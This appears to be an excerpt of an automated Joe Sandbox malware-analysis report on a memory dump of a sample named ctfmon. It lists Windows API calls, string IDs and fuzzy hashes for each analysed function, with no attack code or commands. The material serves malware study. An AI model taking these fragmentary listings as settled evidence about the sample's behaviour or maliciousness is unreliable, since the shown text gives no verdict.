        • Instruction ID: 624bcb37762edd4edd6f55eff34c223af5f14a6d3ea4ea25fcc202f1aac3f0d4
        • Opcode Fuzzy Hash: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
        • Instruction Fuzzy Hash: 1361F3726043065BD720DF64DC81AAF77E9EFD8304F40093EF94597281EA79EA09C76A
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
        • String ID: edit
        • API String ID: 4088303749-2167791130
        • Opcode ID: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
        • Instruction ID: 0ff93033a9c459ba712771479cdbba0860af532220081132ab32d03344424365
        • Opcode Fuzzy Hash: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
        • Instruction Fuzzy Hash: B721816A2015267A9360BB789C40FFF229CAE5EB44B405421FD14C1250F728DA8B8BBD
        APIs
        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 0041F704
        • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 0041F710
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041F72C
        • GetVersion.KERNEL32 ref: 0041F73E
        • GetSystemMetrics.USER32(00000007), ref: 0041F782
        • GetSystemMetrics.USER32(00000008), ref: 0041F78C
        • GetSystemMetrics.USER32(00000004), ref: 0041F796
        • GetSystemMetrics.USER32(0000001E), ref: 0041F79F
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041F7AB
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
        • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
        • API String ID: 1414939872-3863293605
        • Opcode ID: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
        • Instruction ID: 1b76817333bc6af864855b7e5f9623894a9456d6f1598ca0c8fea5307d477cc5
        • Opcode Fuzzy Hash: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
        • Instruction Fuzzy Hash: 31112078950315AAD720AB60AC496CE3F60FF05348F50543AEA00972F0D779848EDF8E
        APIs
        • LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 00412372
        • LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041238E
        • LCMapStringA.KERNEL32(?,?,?,qhA,?,?,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 004123D7
        • MultiByteToWideChar.KERNEL32(?,?,?,qhA,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 0041240F
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
        • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 352835431-109923292
        • Opcode ID: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
        • Instruction ID: 022544586a59cc1c19d10a42de7e4e70b0ca33dfdf838dda5653db0c0489c209
        • Opcode Fuzzy Hash: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
        • Instruction Fuzzy Hash: 28517E31A00209FFCF218F54DE45EEF7BB5FB49750F50412AF914A1260D37989A1DB69
        APIs
        • GetPropA.USER32(?,?), ref: 0041F0B4
        • CallWindowProcA.USER32(00000000), ref: 0041F0D9
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
        • Instruction ID: f1e4040e56493d437ac46db905cae456868ac3245465abe7b0ffa80cda6678ad
        • Opcode Fuzzy Hash: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
        • Instruction Fuzzy Hash: ED518076A04200BFD220EB55DCC4DBFB7B8EBC9715F54442EF94583251E239AC8A87A6
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041F40E
        • GetClientRect.USER32(?,?), ref: 0041F429
        • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041F45B
        • SelectObject.GDI32(?,00000000), ref: 0041F469
        • SetBkMode.GDI32(?,00000002), ref: 0041F47A
        • GetParent.USER32(?), ref: 0041F488
        • SendMessageA.USER32(00000000), ref: 0041F48F
        • SelectObject.GDI32(?,00000000), ref: 0041F499
        • SelectObject.GDI32(?,00000000), ref: 0041F4BB
        • SelectObject.GDI32(?,00000000), ref: 0041F4CB
        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0041F522
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
        • String ID:
        • API String ID: 3606012576-0
        • Opcode ID: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
        • Instruction ID: e1acb393bdb105ea5047fdd93fdf0929f10e42051cf65a82c9b5611acde4adff
        • Opcode Fuzzy Hash: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
        • Instruction Fuzzy Hash: 72413F722443017BD210AB58AC86FBF736CEBC5B14F84053DF70196192D759E90B87BA
        APIs
        • GetWindowLongA.USER32(?,000000FC), ref: 0041CB8D
        • RemovePropA.USER32(?,?), ref: 0041CBC3
        • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBC9
        • RemovePropA.USER32(?,?), ref: 0041CBF7
        • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBFD
        • GetWindow.USER32(?,00000005), ref: 0041CC52
        • GetWindow.USER32(00000000,00000002), ref: 0041CC63
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long$PropRemove
        • String ID:
        • API String ID: 3256693057-0
        • Opcode ID: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
        • Instruction ID: 793464c1ab96f3f28d4b13fd69ea8cc3b37c752f7a31a6ea227274fee3499300
        • Opcode Fuzzy Hash: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
        • Instruction Fuzzy Hash: 7821067A2440257AC3216778BC80DFF228CDB9A368B110136FA04D2290FB29ECC747BD
        APIs
        • __EH_prolog.LIBCMT ref: 00405777
        • MapDialogRect.USER32(?,?), ref: 004057FD
        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040581E
        • CLSIDFromString.OLE32(0000FFFC,?), ref: 00405909
        • CLSIDFromProgID.OLE32(0000FFFC,?), ref: 00405911
        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 004059AD
        • SysFreeString.OLEAUT32(?), ref: 00405A00
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
        • String ID: `DvP?Dv
        • API String ID: 493809305-2995021381
        • Opcode ID: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
        • Instruction ID: ddfec87cd7aa1e3dc79061aa66cd0129ae2a5a4b187d7cfc1545594e6d37e31f
        • Opcode Fuzzy Hash: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
        • Instruction Fuzzy Hash: F3A1197190061ADFCB10DFA9D984AEEBBB4FF08304F14813EE815A7290D7749A55CFA9
        APIs
        • GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CB0
        • GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CCA
        • GetStringTypeW.KERNEL32(00000100,?,00407093,00000008,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CF1
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D24
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
        • GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: StringType$ByteCharMultiWide
        • String ID: @$@
        • API String ID: 3852931651-2930932199
        • Opcode ID: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
        • Instruction ID: 1c15a09582e329dc3b7eb93bde5ac744ef8d040035c95133badfe14c744ef744
        • Opcode Fuzzy Hash: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
        • Instruction Fuzzy Hash: 64519231D00709EBCF219F95DC46AEF7FB4FB89750F20452AF410A6290D3749991DBA8
        APIs
        • __EH_prolog.LIBCMT ref: 0040AE0F
        • VariantClear.OLEAUT32(?), ref: 0040AEB4
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF35
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF44
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF53
        • VariantClear.OLEAUT32(?), ref: 0040AF5D
        • VariantClear.OLEAUT32(?), ref: 0040AF6E
          • Part of subcall function 0040A633: __EH_prolog.LIBCMT ref: 0040A638
          • Part of subcall function 0040A633: VariantClear.OLEAUT32(00000007), ref: 0040AB8C
          • Part of subcall function 0040A633: VariantClear.OLEAUT32(?), ref: 0040AD99
          • Part of subcall function 0040CE35: VariantCopy.OLEAUT32(?,?), ref: 0040CE3D
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Variant$Clear$FreeString$H_prolog$Copy
        • String ID: `DvP?Dv
        • API String ID: 3345578691-2995021381
        • Opcode ID: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
        • Instruction ID: 7a1db6359f3125c85e1e53df7fe4f0938f48fa671959c3eaa9cad5873132af52
        • Opcode Fuzzy Hash: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
        • Instruction Fuzzy Hash: 815128B1A00309EFDB14DFA4C884BEEBBB8FF08704F10452AE115A7291D774A955CB95
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: __ftol$ModeRelease
        • String ID: W
        • API String ID: 1379597261-655174618
        • Opcode ID: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
        • Instruction ID: 8ca894d6ef4fa197229fbb959d41c86698faa0bbb9e13a2d725a5857b8f61538
        • Opcode Fuzzy Hash: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
        • Instruction Fuzzy Hash: 55415D74A01209EFDB14CF98D589AEEBBB0FF44300F1584AAE855AB392C7389E50CF54
        APIs
        • GetStockObject.GDI32(00000011), ref: 004253A8
        • GetStockObject.GDI32(0000000D), ref: 004253B0
        • GetObjectW.GDI32(00000000,0000005C,?), ref: 004253BD
        • GetDC.USER32(00000000), ref: 004253CC
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004253E3
        • MulDiv.KERNEL32(?,00000048,00000000), ref: 004253EF
        • ReleaseDC.USER32(00000000,00000000), ref: 004253FA
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Object$Stock$CapsDeviceRelease
        • String ID: System
        • API String ID: 46613423-3470857405
        • Opcode ID: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
        • Instruction ID: f46f37b3d3d4612b8e83e0057ece6bda57a43c624d054bcf47829690f41a9a48
        • Opcode Fuzzy Hash: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
        • Instruction Fuzzy Hash: 3B117731B00728ABEB109BA59C49FAF7B68AB04795F904026FA05E71D1D7749C42C7A4
        APIs
        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00410685,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F07C,?,0042F0CC,?,?,?,Runtime Error!Program: ), ref: 004154BA
        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004154D2
        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004154E3
        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004154F0
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressProc$LibraryLoad
        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
        • API String ID: 2238633743-4044615076
        • Opcode ID: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
        • Instruction ID: 4643cc2abfda65c973c0f230a36f017a01bddbd01039f16f24786c98e207d1fc
        • Opcode Fuzzy Hash: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
        • Instruction Fuzzy Hash: 7D017571B00611EF8710AFF5ADC4D9B3BAB9AA8690354083BA504D2721DB78C88DAB34
        APIs
        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00424101,?,00020000), ref: 00423E10
        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423E19
        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423E2D
        • #17.COMCTL32 ref: 00423E48
        • #17.COMCTL32 ref: 00423E64
        • FreeLibrary.KERNEL32(00000000), ref: 00423E70
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Library$AddressFreeHandleLoadModuleProc
        • String ID: COMCTL32.DLL$InitCommonControlsEx
        • API String ID: 1437655972-4218389149
        • Opcode ID: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
        • Instruction ID: 75276020c994f243a46c4147610413596e97131f96f2929e1f4ad0196d98a365
        • Opcode Fuzzy Hash: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
        • Instruction Fuzzy Hash: D0F08632B403229786216FE8AC8891F72A8AB947527960476F450E3210CF28ED078B7E
        APIs
        • CompareStringW.KERNEL32(00000000,00000000,0042F1F8,00000001,0042F1F8,00000001,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417B7E
        • CompareStringA.KERNEL32(00000000,00000000,0042F1F4,00000001,0042F1F4,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417B9B
        • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0040F46A,?,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417BF9
        • GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417C4A
        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417CC9
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
        • MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
        • MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
        • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharCompareMultiStringWide$Info
        • String ID:
        • API String ID: 1651298574-0
        • Opcode ID: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
        • Instruction ID: 7b3f78671b9cc246bcbdba2b09b373ac3ce48b51b29b8ccc2d9feaddae2fe836
        • Opcode Fuzzy Hash: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
        • Instruction Fuzzy Hash: FD71AF7590824AAFDF219F94EC819EF7BB5FF45344F10012BF950A2260D3398D91DBA9
        APIs
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FDFC
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE10
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE31
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040FE68
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE88
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEA6
        • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEDB
